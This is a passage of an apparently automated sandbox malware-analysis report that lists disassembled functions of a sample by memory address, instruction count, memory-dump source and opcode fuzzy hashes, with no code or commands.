                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xp
                                                                                                                                                                                                                                        • API String ID: 0-1324357017
                                                                                                                                                                                                                                        • Opcode ID: 4d87e0b0ced7e7daf2cc7b4f545d52b67764d34f3c5fa12a7c2d2f905190be41
                                                                                                                                                                                                                                        • Instruction ID: f421ef7183b0f2c9ca05b305b57cb9ca8cb706696456e2410d76a07eaa6c49a5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d87e0b0ced7e7daf2cc7b4f545d52b67764d34f3c5fa12a7c2d2f905190be41
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58210535750911DBC7199F29D858A3AB3A2BFC9754B14C079E91ACB394CF30DC05DB90
                                                                                                                                                                                                                                        Function 00C35068 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xp
                                                                                                                                                                                                                                        • API String ID: 0-1324357017
                                                                                                                                                                                                                                        • Opcode ID: ccb7d4333fa91ba5a75aefe2f5f07a4cec240dd26a64d5471158b80cd1dcb346
                                                                                                                                                                                                                                        • Instruction ID: 1261aa4e7d7bf660e073465296ef2cbf974a6841c2f9e7975221debcc401d6bc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccb7d4333fa91ba5a75aefe2f5f07a4cec240dd26a64d5471158b80cd1dcb346
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F2123316042499FC7059F64E858BAFBBA1EB85314F008029F8098B251CB35CE5AEB91
                                                                                                                                                                                                                                        Function 00C364F7 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xp
                                                                                                                                                                                                                                        • API String ID: 0-1324357017
                                                                                                                                                                                                                                        • Opcode ID: dbed95f7a8dfebfc6d4ac00ee09124e23d522627a425d4e7524f3ad0d7259f8c
                                                                                                                                                                                                                                        • Instruction ID: ab20a7b3ffa15257752fe2751a5eff41c42c0d4cac4ef3e62a7cefa18cfc4dd7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbed95f7a8dfebfc6d4ac00ee09124e23d522627a425d4e7524f3ad0d7259f8c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD112735741502AFC7165F29D8A897AB7E6FFC971070884B9E80ACB364CF20DC0797A0
                                                                                                                                                                                                                                        Function 0A21FE40 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 0A21FE98
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                        • Opcode ID: 8c343fd2571253fdc0b99f8afed69ac3b06bfe2dba40d6cb66172970dcdebe28
                                                                                                                                                                                                                                        • Instruction ID: 7031bac7f6bbdeaf6cf1de7519d2c930c8f74ad7e3a0b90de1dcced583d9ed78
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c343fd2571253fdc0b99f8afed69ac3b06bfe2dba40d6cb66172970dcdebe28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 441133B5800349CFCB10DF9AC584BDEBBF4EB88320F11842AE968A7340C738A544CFA5
                                                                                                                                                                                                                                        Function 00C37710 Relevance: .6, Instructions: 588COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 224a6bcd4e7b5c939768d99884513ba0699aae07ca97e58dd80aa6a1746954c0
                                                                                                                                                                                                                                        • Instruction ID: 76b339d0c9ba37d70e63085d45b9631ace207d1a890b685089e7b2d1f48eae4e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 224a6bcd4e7b5c939768d99884513ba0699aae07ca97e58dd80aa6a1746954c0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03328E70A142099FCB25CF69D884AAEBBF1FF89314F148659E819DB3A1D731ED41CB90
                                                                                                                                                                                                                                        Function 00C37D50 Relevance: .5, Instructions: 458COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4b3256fa4a19fe3b46629d3096765560d3d535e6d2b66fe02a93ce7eb6732d9e
                                                                                                                                                                                                                                        • Instruction ID: b4e5f11cc56bef8daa16a7470b28c0147421983d8f8db647bd783599a7ecb447
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b3256fa4a19fe3b46629d3096765560d3d535e6d2b66fe02a93ce7eb6732d9e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43126B70A10605CFCB14CF68C584AAEBBF2BF88344F258555F4169B2A1DB31FD86CB69
                                                                                                                                                                                                                                        Function 00C35FB0 Relevance: .4, Instructions: 433COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ffa5db8bc55efb9f98b5e8ec6e1dc5335e5bff49ab2decb10142ee70b92e65ee
                                                                                                                                                                                                                                        • Instruction ID: 9cc8216863712b1d0532c2b2f1a6411319cbfa94af2015946e1170d70ee1ae7a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffa5db8bc55efb9f98b5e8ec6e1dc5335e5bff49ab2decb10142ee70b92e65ee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAE1BE30B10214AFDB159F64C858BBEBBE6ABC8314F14C428E916CB391CF35DD46AB95
                                                                                                                                                                                                                                        Function 00C38508 Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8f1c8115a0d8f8d2211225964d95db94c63c13f6f8d5c6663fe4bbe5dfb6f3d2
                                                                                                                                                                                                                                        • Instruction ID: 5b81fcc7f66f102fc50c340e31727b0b9198374ee7f2f69faa4d08d7c7d6d396
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f1c8115a0d8f8d2211225964d95db94c63c13f6f8d5c6663fe4bbe5dfb6f3d2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DE1F775E106148FCB04DF68C98499DBBF2BF88315F568095F419AB3A2CB31ED46CB61
                                                                                                                                                                                                                                        Function 00C3DEE0 Relevance: .3, Instructions: 313COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e1a7f6bae9651e20b772852a7863070cd9f6660bc7fdd75db775dcb4034d8331
                                                                                                                                                                                                                                        • Instruction ID: e723ceff967f3f8515a4e691068d65dcffbbd2de9c69a8f0f14ff54a48dec269
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1a7f6bae9651e20b772852a7863070cd9f6660bc7fdd75db775dcb4034d8331
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0C16275E102188FDB18DFA9C8806AEBBF2BFC9310F25C459D815AB391DB319D42DB91
                                                                                                                                                                                                                                        Function 00C3E318 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 185c1ca49c17578e36dd2101df9d5779f38979cc665c88f0ff5d73340602f2d1
                                                                                                                                                                                                                                        • Instruction ID: bd066fb2ba2820646a9cf108951d064a8ca40529370ebbcebecc61473a9a4cdc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 185c1ca49c17578e36dd2101df9d5779f38979cc665c88f0ff5d73340602f2d1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E7167347202058FCB24DF69C894AAE7BE5AF8D704F1940A9E812CB3B1DB75DD41DB91
                                                                                                                                                                                                                                        Function 00C3A460 Relevance: .2, Instructions: 178COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: cebc3c89e032be007c80db16a3bc3c651e74760e95ae00f157ceb1b01f45c267
                                                                                                                                                                                                                                        • Instruction ID: 03e6a361ebb1613c1113451ec477a63b4a996f2a9468994c5aecabcd4748f759
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cebc3c89e032be007c80db16a3bc3c651e74760e95ae00f157ceb1b01f45c267
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D5104317506108FCB259B6DD894A2DB7F6EFC8710F2944AAE466CB3A2DB34CC51D782
                                                                                                                                                                                                                                        Function 00C3C328 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0eaf488e400ae4f367a3194a1c5475e7b57a93d668ae254dc687d9fb33b19c52
                                                                                                                                                                                                                                        • Instruction ID: 9ac8617ce0a8c7fb4d03a7a80c4e1a08de5ba5057245346d61869994415f78c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0eaf488e400ae4f367a3194a1c5475e7b57a93d668ae254dc687d9fb33b19c52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB610374E012198FDB14DFA9D8947EEBBB2FF88310F148529E418B7391D7749A86CB90
                                                                                                                                                                                                                                        Function 00C347F0 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 97db9ee3c67d9414d56ad42af924aecd134931c17aae14c6c2a39d07f76f66e2
                                                                                                                                                                                                                                        • Instruction ID: 437658613f29412bb648be3886cd9bcb54d2b34fa52b4de6a2a028b1bb72d074
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97db9ee3c67d9414d56ad42af924aecd134931c17aae14c6c2a39d07f76f66e2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C61B074D01208CFDB18DFA9D5447EEBBB2BF88305F24852AE415AB390EB359946CF54
                                                                                                                                                                                                                                        Function 00C34DF8 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e323224f6f105f5a6ff516595be23e3cc5ca768443bcc7320a5d325692aeb424
                                                                                                                                                                                                                                        • Instruction ID: 40ec6cdb38c9c308573b7fd3400feda224bb3cac6c375e3e62b796d1ca09819b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e323224f6f105f5a6ff516595be23e3cc5ca768443bcc7320a5d325692aeb424
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 394104357102559FD705AB78E498ABE3BE2FFC56147188094D806CB3B6DF209D07ABD2
                                                                                                                                                                                                                                        Function 00C3DD71 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 12a1fd9b4ebee5d2c0f65f4749316e29206546833e0df593265d970729e570c5
                                                                                                                                                                                                                                        • Instruction ID: 561cfab45f0717311b03575ca140c6ff5f294821b06aa330e00f15b47b287df9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12a1fd9b4ebee5d2c0f65f4749316e29206546833e0df593265d970729e570c5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 404115357142458FCB159F28F858AAE7FE2EF89315F048469E81ACF292CB34CD16DB91
                                                                                                                                                                                                                                        Function 00C38340 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5821379a761fa3406c311b78f92606200ee04243c50e824dafc40be70e7c64e7
                                                                                                                                                                                                                                        • Instruction ID: c6fc4a66e8c1a5c18b52e092a764cc6a1598c00c5cb0d750cdb90d96713a2182
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5821379a761fa3406c311b78f92606200ee04243c50e824dafc40be70e7c64e7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9741CF35B002049FCB159F75D854BEEBBF6ABC8710F148469E916EB791CE309C0A9B94
                                                                                                                                                                                                                                        Function 00C390A0 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b0934d0ee6a197067234642530de3cc90eaa313b5694a3cdda3bfa907be7d0c2
                                                                                                                                                                                                                                        • Instruction ID: 16556c1f308202974b5450a235dd20df26fd89fe0ae61c3ca05158a3c0ab4a43
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0934d0ee6a197067234642530de3cc90eaa313b5694a3cdda3bfa907be7d0c2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48418975A1020A9FCB04DF69D888AAE7BB2FF88314F1000A9E912DB3B1C770CD55DB90
                                                                                                                                                                                                                                        Function 00C3EEC0 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: af792493c6049e7e7f3e83ec4420434eae3fa042d2b6bcb292763c113a84f905
                                                                                                                                                                                                                                        • Instruction ID: d1081968d2541c94bc5fb3c3d4b949b71bfa8979265dd2e91d67a7203ba5361c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af792493c6049e7e7f3e83ec4420434eae3fa042d2b6bcb292763c113a84f905
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B210131911B019BC314CBAEC880641FB62BF863B9B598755E8788B6E2C771F813C7D0
                                                                                                                                                                                                                                        Function 00C384F8 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 65f48988ccfc22c7b5e86c7c65c1ac057a04af9695eb1f49c4f008d820404f01
                                                                                                                                                                                                                                        • Instruction ID: 9a30143eadb4f99de6d502619103ad4ca66b7631632a21e8048ae41206899628
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65f48988ccfc22c7b5e86c7c65c1ac057a04af9695eb1f49c4f008d820404f01
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C316B70A106058FCB04CF68C885AAEBBF6BF88324B158159F5159B3A5CB34DC56CB95
                                                                                                                                                                                                                                        Function 00C397F0 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c2cd40b97660b5fb131133f63b87b47a505c6f9ff60525f62b55b22bf2756511
                                                                                                                                                                                                                                        • Instruction ID: ffd16884493fec4b0fdbac2ea4f65042a1eff93c60b278d33d62fca3f265cc91
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2cd40b97660b5fb131133f63b87b47a505c6f9ff60525f62b55b22bf2756511
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA21B731B142558FD714DE679840A7BBBEAEFC7300F144826E425C7295DBB0DD05EBA2
                                                                                                                                                                                                                                        Function 0098D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1469606108.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_98d000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 18d4d22609d00001cc654fbdd07439d2f1d91587069b9a7d4f88f2518b5960c8
                                                                                                                                                                                                                                        • Instruction ID: 0fb574cdbcefbf5f9c6d41055b077849a57e7c46c004a2cd8d758e9b3c7debf5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18d4d22609d00001cc654fbdd07439d2f1d91587069b9a7d4f88f2518b5960c8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF21D075605304DFDB14EF14D984B26BB65FB84324F20C96DD84A4B386C33AD847CB62
                                                                                                                                                                                                                                        Function 0098D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1469606108.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_98d000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3463cacb2587ea7974428964cfe5b1143f240dbee31af52fdbd18f368caf3756
                                                                                                                                                                                                                                        • Instruction ID: 9d7599a420cee226984b5833e7e14d5e79171cdb804351c58cd0ad7c7ebf91a6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3463cacb2587ea7974428964cfe5b1143f240dbee31af52fdbd18f368caf3756
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C221D075605304AFDB05EF14D984B26BBA5FB84314F20CA6DE8494B392C33AD846CB61
                                                                                                                                                                                                                                        Function 00C35FA0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d3e5f99f4e63cfa39b114bc55228c6653bf8542a571796c66eb94e3c20ad0278
                                                                                                                                                                                                                                        • Instruction ID: cfc37f0ada06526345cc2959e5857ff6382c60a818129288ed2537cfbc0072c4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3e5f99f4e63cfa39b114bc55228c6653bf8542a571796c66eb94e3c20ad0278
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5112235B10104AFC7158F24D498AAABBB2EF88321F14C128E819CB241CB31AD59CB94
                                                                                                                                                                                                                                        Function 0098D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1469606108.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_98d000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e2cae935d8e09101977e8aa9bde5cb445191eb58c0014e8807defc318e55d2c4
                                                                                                                                                                                                                                        • Instruction ID: bf2cae26d99c163c6aa252535e28448435d3219f504fa89ee8920d65e8655f89
